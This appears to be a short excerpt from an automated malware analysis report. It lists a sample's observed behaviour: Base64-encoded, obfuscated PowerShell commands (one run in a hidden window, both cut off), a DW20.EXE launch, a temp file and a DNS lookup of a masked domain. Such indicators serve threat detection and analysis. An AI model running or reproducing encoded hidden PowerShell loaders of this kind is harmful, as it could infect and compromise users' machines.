Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABWAFoAQQBEAEIAQQBCAD0AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBHAFEAQQBRAEEAJwAsACcAWgBCACcAKQA7ACQAcQAxAEEAQQBfAFgAQQA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAAKAAnAE4AZQB0AC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1476
- %TEMP%\1265885.cvr
- DNS ASK dk####bekah.email
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABWAFoAQQBEAEIAQQBCAD0AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBHAFEAQQBRAEEAJwAsACcAWgBCACcAKQA7ACQAcQAxAEEAQQBfAFgAQQA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAAKAAnAE4AZQB0AC...' (with hidden window)